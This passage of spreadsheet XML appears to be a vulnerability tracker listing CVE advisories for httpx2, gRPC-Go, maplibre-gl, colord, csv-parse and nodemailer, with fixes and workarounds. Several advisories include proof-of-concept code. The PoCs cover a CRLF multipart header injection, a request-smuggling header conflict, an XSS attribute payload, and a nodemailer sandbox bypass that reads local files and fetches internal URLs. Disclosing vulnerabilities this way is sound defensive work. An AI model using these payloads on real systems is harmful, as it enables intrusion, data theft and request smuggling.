Upgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.

If upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.</t></is></c><c r="T1641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="1642"><c r="A1642" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1642" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D1642" s="5" t="inlineStr" /><c r="E1642" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1642" s="5" t="inlineStr" /><c r="H1642" s="5" t="n"><v>0.003</v></c><c r="I1642" s="5" t="inlineStr" /><c r="J1642" s="5" t="inlineStr" /><c r="K1642" s="5" t="inlineStr" /><c r="L1642" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1642" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1642" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1642" s="5" t="inlineStr" /><c r="R1642" s="5" t="inlineStr" /><c r="S1642" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.

### Details

The three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "https://example.com/upload",
    headers={"Content-Type": "multipart/form-data; boundary=BOUNDARY"},
    files={
        "file": (
            "safe.txt",
            b"payload",
            "text/plain\r\nX-Injected: true",
        )
    },
)

print(request.read().decode())
```

The generated body contains an attacker-injected part header:

```text
--BOUNDARY
Content-Disposition: form-data; name="file"; filename="safe.txt"
Content-Type: text/plain
X-Injected: true

payload
--BOUNDARY--
```

The same issue affects names and values in the custom header mapping from the four-element tuple.

Field names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.

### Impact

Applications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.

This does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.

If upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.</t></is></c><c r="T1642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="1643"><c r="A1643" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1643" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D1643" s="5" t="inlineStr" /><c r="E1643" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1643" s="5" t="inlineStr" /><c r="H1643" s="5" t="n"><v>0.002</v></c><c r="I1643" s="5" t="inlineStr" /><c r="J1643" s="5" t="inlineStr" /><c r="K1643" s="5" t="inlineStr" /><c r="L1643" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1643" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1643" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1643" s="5" t="inlineStr" /><c r="R1643" s="5" t="inlineStr" /><c r="S1643" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.

### Details

When a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "http://example.com/",
    headers={"Transfer-Encoding": "chunked"},
    content=b"test 123",
)

print(request.headers)
```

The request contains both:

```text
Transfer-Encoding: chunked
Content-Length: 8
```

On an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.

Streaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.

### Impact

An attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.

Depending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.

If upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.</t></is></c><c r="T1643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="1644"><c r="A1644" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1644" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D1644" s="5" t="inlineStr" /><c r="E1644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1644" s="5" t="inlineStr" /><c r="H1644" s="5" t="n"><v>0.001</v></c><c r="I1644" s="5" t="inlineStr" /><c r="J1644" s="5" t="inlineStr" /><c r="K1644" s="5" t="inlineStr" /><c r="L1644" s="5" t="inlineStr"><is><t>PyPI:httpcore2, PyPI:httpx2</t></is></c><c r="M1644" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1644" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1644" s="5" t="inlineStr" /><c r="R1644" s="5" t="inlineStr" /><c r="S1644" s="5" t="inlineStr"><is><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is></c><c r="T1644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="1645"><c r="A1645" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1645" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D1645" s="5" t="inlineStr" /><c r="E1645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1645" s="5" t="inlineStr" /><c r="H1645" s="5" t="n"><v>0.004</v></c><c r="I1645" s="5" t="inlineStr" /><c r="J1645" s="5" t="inlineStr" /><c r="K1645" s="5" t="inlineStr" /><c r="L1645" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1645" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1645" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1645" s="5" t="inlineStr" /><c r="R1645" s="5" t="inlineStr" /><c r="S1645" s="5" t="inlineStr"><is><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is></c><c r="T1645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="1646"><c r="A1646" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1646" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D1646" s="5" t="inlineStr" /><c r="E1646" s="5" t="inlineStr" /><c r="F1646" s="5" t="inlineStr" /><c r="G1646" s="5" t="inlineStr" /><c r="H1646" s="5" t="n"><v>0.007</v></c><c r="I1646" s="5" t="inlineStr" /><c r="J1646" s="5" t="inlineStr" /><c r="K1646" s="5" t="inlineStr" /><c r="L1646" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1646" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N1646" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1646" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1646" s="5" t="inlineStr" /><c r="R1646" s="5" t="inlineStr" /><c r="S1646" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="T1646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="1647"><c r="A1647" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1647" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D1647" s="5" t="inlineStr" /><c r="E1647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1647" s="5" t="inlineStr" /><c r="H1647" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1647" s="5" t="inlineStr" /><c r="J1647" s="5" t="inlineStr" /><c r="K1647" s="5" t="inlineStr" /><c r="L1647" s="5" t="inlineStr"><is><t>PyPI:winml-cli</t></is></c><c r="M1647" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1647" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1647" s="5" t="inlineStr" /><c r="R1647" s="5" t="inlineStr" /><c r="S1647" s="5" t="inlineStr"><is><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is></c><c r="T1647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="1648"><c r="A1648" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1648" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D1648" s="5" t="inlineStr" /><c r="E1648" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1648" s="5" t="inlineStr" /><c r="H1648" s="5" t="n"><v>0.003</v></c><c r="I1648" s="5" t="inlineStr" /><c r="J1648" s="5" t="inlineStr" /><c r="K1648" s="5" t="inlineStr" /><c r="L1648" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M1648" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1648" s="5" t="inlineStr" /><c r="R1648" s="5" t="inlineStr" /><c r="S1648" s="5" t="inlineStr"><is><t>### Impact
`DOM.sanitize()` in `src/util/dom.ts` iterated `elem.attributes` (a live `NamedNodeMap`) while calling `elem.removeAttribute()` in the same loop. Removing an attribute shifts subsequent attributes down by one index, causing the iterator to skip the adjacent attribute.

An attacker can provide an HTML payload with consecutive dangerous attributes (such as `&lt;details open onload="1" ontoggle="..."&gt;`). The first attribute is stripped while the second survives and executes upon insertion into `innerHTML` via the attribution control without requiring user interaction (zero-click XSS).

Applications rendering untrusted/third-party style attribution strings or user-supplied custom attributions are impacted.

### Patches
The issue has been resolved by creating a static snapshot of attributes using `Array.from(elem.attributes)` before iteration. Please upgrade to `maplibre-gl` version **6.4.1** (or latest).

### Workarounds
Sanitizing the attribute field of a source before passing it down to maplibre</t></is></c><c r="T1648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="1649"><c r="A1649" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1649" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D1649" s="5" t="inlineStr" /><c r="E1649" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1649" s="5" t="inlineStr" /><c r="H1649" s="5" t="n"><v>0.003</v></c><c r="I1649" s="5" t="inlineStr" /><c r="J1649" s="5" t="inlineStr" /><c r="K1649" s="5" t="inlineStr" /><c r="L1649" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M1649" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1649" s="5" t="inlineStr" /><c r="R1649" s="5" t="inlineStr" /><c r="S1649" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="T1649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="1650"><c r="A1650" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1650" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D1650" s="5" t="inlineStr" /><c r="E1650" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1650" s="5" t="inlineStr" /><c r="H1650" s="5" t="n"><v>0.003</v></c><c r="I1650" s="5" t="inlineStr" /><c r="J1650" s="5" t="inlineStr" /><c r="K1650" s="5" t="inlineStr" /><c r="L1650" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M1650" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1650" s="5" t="inlineStr" /><c r="R1650" s="5" t="inlineStr" /><c r="S1650" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="T1650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="1651"><c r="A1651" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1651" s="5" t="inlineStr"><is><t>CVE-2026-86477</t></is></c><c r="D1651" s="5" t="inlineStr" /><c r="E1651" s="5" t="inlineStr" /><c r="F1651" s="5" t="inlineStr" /><c r="G1651" s="5" t="inlineStr" /><c r="H1651" s="5" t="inlineStr" /><c r="I1651" s="5" t="inlineStr" /><c r="J1651" s="5" t="inlineStr" /><c r="K1651" s="5" t="inlineStr" /><c r="L1651" s="5" t="inlineStr" /><c r="M1651" s="5" t="inlineStr" /><c r="N1651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1651" s="5" t="inlineStr" /><c r="R1651" s="5" t="inlineStr" /><c r="S1651" s="5" t="inlineStr"><is><t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.</t></is></c><c r="T1651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86477</t></is></c></row><row r="1652"><c r="A1652" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1652" s="5" t="inlineStr"><is><t>CVE-2026-92595</t></is></c><c r="D1652" s="5" t="inlineStr" /><c r="E1652" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1652" s="5" t="inlineStr" /><c r="H1652" s="5" t="inlineStr" /><c r="I1652" s="5" t="inlineStr" /><c r="J1652" s="5" t="inlineStr" /><c r="K1652" s="5" t="inlineStr" /><c r="L1652" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1652" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1652" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1652" s="5" t="inlineStr" /><c r="R1652" s="5" t="inlineStr" /><c r="S1652" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="T1652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92595</t></is></c></row><row r="1653"><c r="A1653" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1653" s="5" t="inlineStr"><is><t>CVE-2026-92596</t></is></c><c r="D1653" s="5" t="inlineStr" /><c r="E1653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1653" s="5" t="inlineStr" /><c r="H1653" s="5" t="inlineStr" /><c r="I1653" s="5" t="inlineStr" /><c r="J1653" s="5" t="inlineStr" /><c r="K1653" s="5" t="inlineStr" /><c r="L1653" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1653" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1653" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1653" s="5" t="inlineStr" /><c r="R1653" s="5" t="inlineStr" /><c r="S1653" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's address parser (`lib/addressparser/index.js`) parses a list of comma‑separated addresses in **quadratic time — O(n²)** in the number of addresses. A single crafted address string (e.g. a `To`, `Cc`, `Bcc`, `From`, or `Reply‑To` value, or any value passed to the exported `addressparser`) therefore consumes CPU proportional to the **square** of its length and blocks Node's single‑threaded event loop for the entire duration, denying service to every other request in the process.

This requires **no special application configuration and no cooperating receiver** — it is entirely inside the parser and triggers on the library's default code path. A ~1.5 MB address value freezes the process for ~25–30 seconds of 100% CPU; the cost grows with the square of the input, so a few‑MB value stalls the server for minutes. It is a distinct issue from the recursion DoS fixed as CVE‑2025‑14874 (that path is guarded by a nesting‑depth cap; this one is a flat, comma‑separated list with no such limit).

### Details

`addressparser` tokenizes the input, splits it into per‑address token groups, and then accumulates the parsed results in a loop (`lib/addressparser/index.js`, ~lines 500–505):

```js
addresses.forEach(addr =&gt; {
    const handled = _handleAddress(addr, depth);
    if (handled.length) {
        parsedAddresses = parsedAddresses.concat(handled);   // &lt;-- line ~503
    }
});
```

`Array.prototype.concat` builds and returns a **new** array containing a copy of every element accumulated so far. Reassigning `parsedAddresses = parsedAddresses.concat(handled)` on each of the *n* iterations copies 1 + 2 + 3 + … + n elements in total, i.e. **O(n²)** work (and O(n²) transient allocations) for an input containing *n* addresses. Tokenization and `_handleAddress` themselves are linear; the quadratic blowup is entirely this accumulator.

**Root‑cause proof.** Replacing only that line with an in‑place append and re‑running the exact same input:

```
parsedAddresses = parsedAddresses.concat(handled);      -&gt;  100000 addresses:  ~6068 ms
